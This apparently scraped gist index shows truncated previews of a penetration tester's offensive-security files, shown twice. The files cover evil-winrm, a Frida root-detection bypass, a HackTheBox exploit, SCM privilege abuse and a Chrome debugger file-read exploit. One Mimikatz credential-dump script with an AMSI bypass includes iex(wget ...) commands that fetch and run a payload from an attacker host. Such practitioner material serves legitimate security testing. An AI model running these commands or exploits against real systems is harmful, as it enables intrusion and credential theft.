LongCat pich4ya

## openssl3_no_md4.txt
# @author Pichaya Morimoto (p.morimoto@sth.sh)

# gem install evil-winrm
# evil-winrm -u "${user}" -p "${pass}"  -i "${ip}"

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

## root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
//  - I added extra whitelisted items to deal with the latest versions
// 						of RootBeer/Cordova iRoot as of August 6, 2019
//  - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {

    var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",

## htb_clicker.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
import requests
import random
import string
import urllib.parse
from base64 import b64encode,b64decode

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

## proxychains-ng_m1.txt
# @author Pichaya Morimoto (p.morimoto@sth.sh)

Problem:

```bash
brew install proxychains-ng
proxychains4 ncat 1.2.3.4 # not working
```

There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/

## bloodhound-python_issues.txt
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Compiled list of my common bloodhound-python problems & solutions

Bloodhound-python Error #0
You do not get info like GPO and permission abuse edges.
You need to add option -> -c All,LoggedOn

Bloodhound-python Error #1
    raise NoNameservers(request=self.request, errors=self.errors)
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL

## SCM_backdoor.txt
@author LongCat (Pichaya Morimoto)

By default, only admin users have right to manage SCM
but if you (mistakenly) grant a non-admin user to manage SCM,
he will be able to perform tasks on behalf admin / nt authority system rights.

This fact is a known system design mentioned in ..

1. Service Security and Access Rights
https://docs.microsoft.com/en-us/windows/desktop/Services/service-security-and-access-rights

## Invoke-OneShot-Mimikatz.ps1
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)

## brain_check.py
# A numeric lock has a 3 digit key
# "682" - One number is correct and well placed
# "614" - One number is correct but wrongly placed
# "206" - Two number are correct but wrongly placed
# "738" - Nothing is correct
# "780" - One number is correct but wrongly placed

from z3 import *

# Create three integer variables for the lock digits

## chrome_remote_debug_lfi.py
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine with
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase
import requests
import json
import urllib3
import websocket

## gist:1ac125726e4f79c6832899e6c9b7bde1
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# วิธี mitm ดัก Web API ของ iOS App ผ่าน MacOS -> Burp Suite ที่เป็น unaware proxy
# (เช่น Xamarin, Flutter ที่ไม่วิ่งผ่าน System Proxy ไม่ใช้ default Cert Store ใน iPhone)
# ถ้าเป็นแอปปกติ ที่ใช้ system proxy อยู่แล้วไม่ต้องทำท่านี้ก็ได้ ตั้ง proxy ปกติไปได้เลย

1. เสียบ iPhone (ที่ jailbreak แล้ว) กับ MBP ผ่าน USB แล้วใช้ iproxy ตั้งให้ local port 8080 บน iPhone วิ่งเข้า local port 8080 บน MBP ด้วย ssh reverse tunnel (-R)
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 root@127.0.0.1 -N -f
	# @author Pichaya Morimoto (p.morimoto@sth.sh)

	# gem install evil-winrm
	# evil-winrm -u "${user}" -p "${pass}" -i "${ip}"

	Evil-WinRM shell v3.4

	Info: Establishing connection to remote endpoint

	Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
	// $ frida -l antiroot.js -U -f com.example.app --no-pause
	// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
	// - I added extra whitelisted items to deal with the latest versions
	// of RootBeer/Cordova iRoot as of August 6, 2019
	// - The original one just fucked up (kill itself) if Magisk is installed lol
	// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
	// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
	Java.perform(function() {

	var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
	import requests
	import random
	import string
	import urllib.parse
	from base64 import b64encode,b64decode

	requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
	proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
	# @author Pichaya Morimoto (p.morimoto@sth.sh)

	Problem:

	```bash
	brew install proxychains-ng
	proxychains4 ncat 1.2.3.4 # not working
	```

	There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# Compiled list of my common bloodhound-python problems & solutions

	Bloodhound-python Error #0
	You do not get info like GPO and permission abuse edges.
	You need to add option -> -c All,LoggedOn

	Bloodhound-python Error #1
	raise NoNameservers(request=self.request, errors=self.errors)
	dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL
	@author LongCat (Pichaya Morimoto)

	By default, only admin users have right to manage SCM
	but if you (mistakenly) grant a non-admin user to manage SCM,
	he will be able to perform tasks on behalf admin / nt authority system rights.

	This fact is a known system design mentioned in ..

	1. Service Security and Access Rights
	https://docs.microsoft.com/en-us/windows/desktop/Services/service-security-and-access-rights
	# TLDR:
	# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
	#
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
	# (Tested and worked on Windows 10 x64 patched 2022-03-26)
	#
	# Usage:
	# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
	# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
	# A numeric lock has a 3 digit key
	# "682" - One number is correct and well placed
	# "614" - One number is correct but wrongly placed
	# "206" - Two number are correct but wrongly placed
	# "738" - Nothing is correct
	# "780" - One number is correct but wrongly placed

	from z3 import *

	# Create three integer variables for the lock digits
	#!/usr/bin/env python
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
	# pip install requests websocket-client python-socks
	# This exploit code can be used to read arbitrary files on the victim machine with
	# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase
	import requests
	import json
	import urllib3
	import websocket
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
	# วิธี mitm ดัก Web API ของ iOS App ผ่าน MacOS -> Burp Suite ที่เป็น unaware proxy
	# (เช่น Xamarin, Flutter ที่ไม่วิ่งผ่าน System Proxy ไม่ใช้ default Cert Store ใน iPhone)
	# ถ้าเป็นแอปปกติ ที่ใช้ system proxy อยู่แล้วไม่ต้องทำท่านี้ก็ได้ ตั้ง proxy ปกติไปได้เลย

	1. เสียบ iPhone (ที่ jailbreak แล้ว) กับ MBP ผ่าน USB แล้วใช้ iproxy ตั้งให้ local port 8080 บน iPhone วิ่งเข้า local port 8080 บน MBP ด้วย ssh reverse tunnel (-R)
	$ brew install usbmuxd
	$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 root@127.0.0.1 -N -f